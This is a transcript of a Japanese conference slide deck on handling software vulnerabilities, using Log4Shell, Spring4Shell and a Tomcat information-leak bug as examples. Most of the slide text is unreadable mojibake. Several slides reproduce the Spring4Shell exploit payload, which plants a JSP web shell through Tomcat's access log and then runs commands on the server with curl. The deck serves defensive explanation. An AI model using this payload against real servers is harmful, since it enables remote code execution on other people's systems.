Upgrade to Pro — share decks privately, control downloads, hide ads and more …

How To 脆弱性対応

cm-komuro
November 21, 2022

How To 脆弱性対応

DevelopersIO Sapporo 2022 の登壇資料です

cm-komuro

November 21, 2022
Tweet

More Decks by cm-komuro

Other Decks in Programming

Transcript

  1. )PXUP੬ऑੑରԠ
    %FWFMPQFST*04BQQPSP

    View full-size slide

  2. ͜Ε͔Β࿩͢಺༰
    ݸਓͷܦݧͰ͢

    View full-size slide


  3. w੬ऑੑͷͳ͍γεςϜ͸ͳ͍ͱݴ͍͍ͬͯ
    wݕ஌ɺӨڹൣғௐࠪɺճආࡦɺ߃ٱରԠ
    wݕ஌͔Βઌ͸ਓ͕൑அ͢Δ
    w044ͳΒ͹ίʔυΛಡΊ͹େମ෼͔Δ
    wηΩϡϦςΟ͸શһͰҙࣝ͢Δ
    ͸͡Ίʹ

    View full-size slide

  4. ࣗݾ঺հ
    /BNFখࣨɹܒʢ,0.630)*3",6ʣ
    5FBNQSJTNBUJYࣄۀ෦'BOOBMZνʔϜ
    3PMFϓϩδΣΫτϚωʔδϟ
    *OUFSFTUT+BWB 4QSJOH ੬ऑੑௐࠪ

    View full-size slide


  5. ੬ऑੑ͸ͳͥϚζΠͷ͔

    View full-size slide

  6. ੬ऑੑ์ஔ͸ϚζΠ
    wϚϧ΢ΣΞͷײછ΍όοΫυΞ
    wϢʔβʔ৘ใ౳ͷ$PO
    fi
    EFOUJBMͳ৘ใୣऔ
    wผͷ߈ܸର৅ͷ౿Έ୆
    w߈ܸՄೳର৅ͱͯ͠ϚʔΫ
    wFUDʜ

    View full-size slide


  7. Vulnerability

    View full-size slide

  8. ੬ऑੑ͸͍ΖΜͳϨΠϠʔʹ
    wΠϯϑϥ
    w04
    wϛυϧ΢ΣΞʢ࣮ߦ؀ڥʣ
    wΞϓϦέʔγϣϯίʔυ
    wଟछଟ༷
    ͜ͷ͋ͨΓ͕λʔήοτͷ࿩

    View full-size slide

  9. νΣοΫͷํ๏͸खಈ͔Βࣗಈ·Ͱ༷ʑ
    w$7&
    IUUQTXXXDWFPSH%PXOMPBET
    w+7/
    IUUQTKWOKQ
    w4QSJOHܥͷ৔߹ɺ7.XBSFͷ੬ऑੑҰཡ
    IUUQTUBO[VWNXBSFDPNTFDVSJUZ
    w4OZL౳ͷηΩϡϦςΟαʔϏε
    w5XJUUFS

    View full-size slide


  10. ௐ΂ͨ΋ͷͨͪ

    View full-size slide

  11. ੬ऑੑ$PNNJUΛಡΜͰߟ͑ͨΓͯ͠·͢
    w-PHK੬ऑੑ໰୊ʹ͓͚Δ4QSJOH#PPUΞϓϦέʔγϣϯͷݕ

    IUUQTEFWDMBTTNFUIPEKQBSUJDMFTMPHKSDFTQSJOHCPPUSFTFBSDI
    wDWF4QSJOH4IFMMͷӨڹௐࠪ
    IUUQTEFWDMBTTNFUIPEKQBSUJDMFTTQSJOHCPPUTQSJOHTIFMM
    w5PNDBUͷमਖ਼$PNNJUΛಡΜͰཧղ͢Δ$7&
    IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPS
    DWF

    View full-size slide

  12. ࢀর৘ใͱͯ͠ܝࡌ͞Εͨ
    w1JZPMPH
    IUUQTQJZPMPHIBUFOBEJBSZKQFOUSZ
    w+7/
    IUUQTKWOKQWV+7/76JOEFYIUNM

    View full-size slide


  13. ͲͷΑ͏ʹಈ͍͍ͯΔ͔

    View full-size slide

  14. ରԠνʔϜ
    wେମ໊͘Β͍Ͱଈ੮νʔϜ࡞੒
    wऔΓ·ͱΊ໊
    w࠶ݱɺӨڹௐࠪ୲౰ʙ໊
    wճආࡦɺݪҼڀ໌୲౰ʙ໊

    View full-size slide

  15. νʔϜͷಈ͖
    ॳಈͰӨڹൣғͷେ͖͞ͱɺґଘͷ༗ແΛ֬ೝ
    Өڹ͕͋Γͦ͏ɻௐ͕ࠪඞཁͳ৔߹͸νʔϜ্ཱͪ͛
    νʔϜ಺Ͱ໾ׂ෼୲
    ฒߦ࡞ۀ
    ׂͱ͜·Ίʹ৘ใڞ༗

    View full-size slide

  16. ࠶ݱνʔϜ
    w1P$ͷίʔυΛݩʹ߈ܸΛ࠶ݱ
    wطଘͷߏ੒ɺ৚݅Λຬͨ͢Α͏มߋͨ͠ߏ੒ɻେ͖͘
    ύλʔϯͰνΣοΫ
    w؇࿨ࡦΛೖΕͯճආͰ͖Δ͔ΛνΣοΫɹ

    View full-size slide


  17. ݪҼௐࠪνʔϜ

    View full-size slide

  18. ࠜຊݪҼͷ֬ೝ
    wमਖ਼$PNNJU͔ΒಡΈղ͘
    w෼ੳ͍ͯ͠ΔηΩϡϦςΟձࣾ΍ݸਓ͕ެ։͍ͯ͠Δ
    ϒϩά౳ΛಡΉʢ΄΅ӳޠ
    w࠶ݱͨ͠ߏ੒͔Βσόοά࣮ߦΛར༻
    wϩάϨϕϧΛมߋͯ͠ಡΈղ͘

    View full-size slide

  19. ͕࣌ؒ͋ͬͨΒ΍Δ
    ۩ମྫ

    View full-size slide


  20. ۩ମྫ: Log4Shell

    View full-size slide

  21. -PH4IFMM
    w$7&
    w೥຤ʹ૽͕Εͨ΍͹͍੬ऑੑ
    w੬ऑੑ͕͋Δର৅Ͱ͋Ε͹୭Ͱ΋࣮ߦՄೳ
    w-PHK
    Α͘஌ΒΕͨ-PHHFS࣮૷
    ଞ࣮૷Ͱ୅දతͳͷ͕-PHCBDL

    View full-size slide

  22. զʑ͕ݕূͨ͠ಈ࡞

    View full-size slide

  23. -PH4IFMM
    w$7&࠾൪ΑΓઌʹ1P$͕࿩୊ʹ
    wઐ໳తͳ஌͕ࣝগͳͯ͘΋߈ܸͰ͖ͯ͠·͏
    w೚ҙͷΫϥεΛಈతʹ*OKFDUͯ͠͠·͏

    View full-size slide


  24. ۩ମྫ: Spring4Shell

    View full-size slide

  25. 4QSJOH4IFMM
    4QSJOHͷۭؾΛಡΜͰ୳͠ʹ͍͘ػߏΛѱ༻
    -PH4IFMMΑΓ࣮ߦ͢ΔͨΊͷ৚͕݅ϋʔυ
    +BWBҎ͕߱ର৅
    XBSλΠϓͰىಈ͞Ε͍ͯΔ

    View full-size slide

  26. +BWBҎ͕߱ର৅
    wNPEVMF͸+BWBҎ߱
    w+BWBҎલ͸NPEVMF͕ͳ͍ͷͰ1P$ͷ߈ܸํ๏
    ͸੒ޭ͠ͳ͍
    IUUQTXXXPSBDMFDPNDPSQPSBUFGFBUVSFTVOEFSTUBOEJOH
    KBWBNPEVMFTIUNM

    View full-size slide

  27. ىಈλΠϓͷҧ͍
    wXBSλΠϓʹΑΔΞϓϦέʔγϣϯ͕ର৅
    wCPPU+BS CPPU8BS౳ͷ୯ಠͰىಈՄೳͳ΋ͷ͸ର
    ৅֎

    View full-size slide

  28. ҎԼͷϦΫΤετΛղऍ͠Α͏ͱ͢Δ
    wҎԼΛ#PEZʹؚΊͯ1045ͰϦΫΤετ
    w%BUB#JOEJOHͰ#JOEͰ͖ΔΫϥεΛ୳͢
    class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2
    %7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))
    %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.get
    Parameter(%22cmd%22)).getInputStream()
    %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20wh
    ile((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))
    %3B%20%7D%20%7D%20%25%7Bsuffix%7Di


    &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp


    &class.module.classLoader.resources.context.parent.pipeline.first.directory=webap
    ps/ROOT


    &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwa
    r


    &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


    View full-size slide

  29. ԿΛ͠Α͏ͱ͍ͯ͠Δ͔
    w$MBTT-PBEFSΛḷͬͯ"DDFTT7BMWFʹΞΫηε
    w5PNDBUͷϩάग़ྗઃఆΛॻ͖׵͑Δ
    wϩάग़ྗύλʔϯʹ಺෦৘ใΛऔಘ͢ΔίʔυΛจࣈͱ
    ͯ͠ຒΊࠐΉ
    wϩάϑΝΠϧΛ+41ͱ֦ͯ͠ுࢠΛมߋ
    wϩάϑΝΠϧग़ྗઌΛ5PNDBUͷެ։σΟϨΫτϦʹม
    ߋ

    View full-size slide

  30. ࣮ߦ͞ΕΔͱԿ͕ى͖Δ͔
    wϦΫΤετΛ࣮ߦ͢ΔͱϩάϑΝΠϧ͕+41ͱͳΔ
    wެ։͞ΕΔ
    %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))
    %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet
    er(%22cmd%22)).getInputStream()
    %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%
    3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    %{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}
    i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b
    = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
    curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami'
    XIPBNJ͕ग़ྗ͞ΕΔ

    View full-size slide

  31. ىಈλΠϓ
    ߈ܸख๏͕༗ޮͳ$MBTT-PBEFS
    8FCBQQ$MBTT-PBEFS
    ߈ܸख๏͕ແޮͳ$MBTT-PBEFS
    -BVODIFE63-$MBTT-PBEFS
    ͯ͞ɻҧ͍͸ͳʹ͔ɻ

    View full-size slide

  32. ҧ͍͸HFU3FTPVSDFT .BZCF

    8FCBQQ$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ
    HFU3FTPVSDFT
    ͕ఆٛ͞Ε͍ͯΔ
    IUUQTUPNDBUBQBDIFPSHUPNDBUEPDBQJPSHBQBDIF
    DBUBMJOBMPBEFS8FCBQQ$MBTT-PBEFS#BTFIUNMHFU3FTPVSDFT

    View full-size slide

  33. ҧ͍͸HFU3FTPVSDFT .BZCF

    -BVODIFE63-$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ
    HFU3FTPVSDFT
    ͷఆٛ͸ͳ͍
    IUUQTEPDTPSBDMFDPNKBWBTFKQEPDTBQJKBWBCBTFKBWBMBOH
    $MBTT-PBEFSIUNMHFU3FTPVSDF KBWBMBOH4USJOH

    View full-size slide

  34. #JOEJOHͰ$MBTT-PBEFS΁ΞΫηε
    DMBTTNPEVMFDMBTT-PBEFS
    HFU$MBTT
    HFU.PEVMF
    HFU$MBTT-PBEFS

    class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20
    if(%22j%22.equals(request.getParameter(%22pwd%22)))
    %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet
    er(%22cmd%22)).getInputStream()
    %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%
    3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    ͜ͷ$MBTT-PBEFS͕8FCBQQ$MBTT-PBEFSͩͱ
    Ҿ਺ͳ͠ͷHFU3FTPVSDFT
    ͕ଘࡏ͢Δ

    View full-size slide

  35. 5SBWFSTF$MBTT
    8FCBQQ$MBTT-PBEFSHFU3FTPVSDFT

    8FC3FTPVSDF3PPUHFU$POUFYU

    $POUFYUHFU1BSFOU

    $POUBJOFSHFU1JQFMJOF

    1JQFMJOFHFU'JSTU

    7BMWF "DDFTT7BMWF

    View full-size slide

  36. ͲͷΑ͏ʹमਖ਼͞Ε͔ͨ
    IUUQTHJUIVCDPNTQSJOHQSPKFDUTTQSJOHGSBNFXPSLQVMM
    fi
    MFT
    $MBTT-PBEFS΁ͷϓϩύςΟΞΫηε͸ແࢹ

    View full-size slide


  37. ۩ମྫ: Tomcat ͷ৘ใ࿙͍͑

    View full-size slide

  38. 3FTQPOTF͕ࠞࡏ͢Δ
    w+7/76"QBDIF5PNDBUʹ
    )UUQ1SPDFTTPSΠϯελϯεʹ͓͚Δڝ߹ঢ়ଶʹ
    ΑΔ৘ใ࿙͍͑ͷ੬ऑੑ
    IUUQTKWOKQWV+7/76JOEFYIUNM

    View full-size slide

  39. ࠶ݱ৚͕݅ݫ͍͠
    w֎෦͔Β೚ҙͰ࣮ߦ͢Δͷ͸೉͍͠
    wۮવൃੜ͢ΔՄೳੑ͸͋Δ
    wର৅͸ҎԼ
    "QBDIF5PNDBU.UP.
    "QBDIF5PNDBU.UP
    "QBDIF5PNDBU.UP
    "QBDIF5PNDBUUP

    View full-size slide

  40. मਖ਼$PNNJUΛಡΉ
    IUUQTHJUIVCDPNBQBDIFUPNDBUDPNNJUCBEFGDDGEGD
    w0CKFDU
    "UPNJD3FGFSFODF0
    CKFDU΁มߋ
    wUBLF$VSSFOU1SPDFTT
    PS
    ͕௥Ճ

    View full-size slide

  41. ͬ͘͟Γཧղ͢Δʢݸਓͷݟղ
    wෳ਺ͷϓϩηε͔Βࢀর͞ΕΔ0CKFDU
    w͜ͷ0CKFDU͸4PDLFUʹ3FTQPOTFΛॻ͖ࠐΉ
    wHFUͨ͠ޙɺ͠Β͹͔ͯ͘͠ΒOVMMΛ୅ೖ͢Δॲཧ
    wۮવOVMMΛಥͬࠐΉલʹผϓϩηε͕0CKFDUʹΞΫηε
    ͢Δͱɺಉ͡ࢀর͕ฦΔ
    wෳ਺ͷ3FTQPOTFΛಉ͡0CKFDUʹॻ͖ࠐΉ
    IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPSDWF

    View full-size slide

  42. ·ͱΊ
    w੬ऑੑ͸਎ۙʹ͋Γ·͢
    ରԠ଴ͬͨͳ͠
    wଞਓͷ࡞ͬͨίʔυΛ࢖Θͣʹ։ൃͰ͖Δ΋ͷ͸গͳ
    ͍
    w։ൃऀ͸ར༻͍ͯ͠Δ044Λ΋ͬͱҙࣝ͠·ͤ͏
    wηΩϡϦςΟ͸ΈΜͳͰߟ͑·ͤ͏

    View full-size slide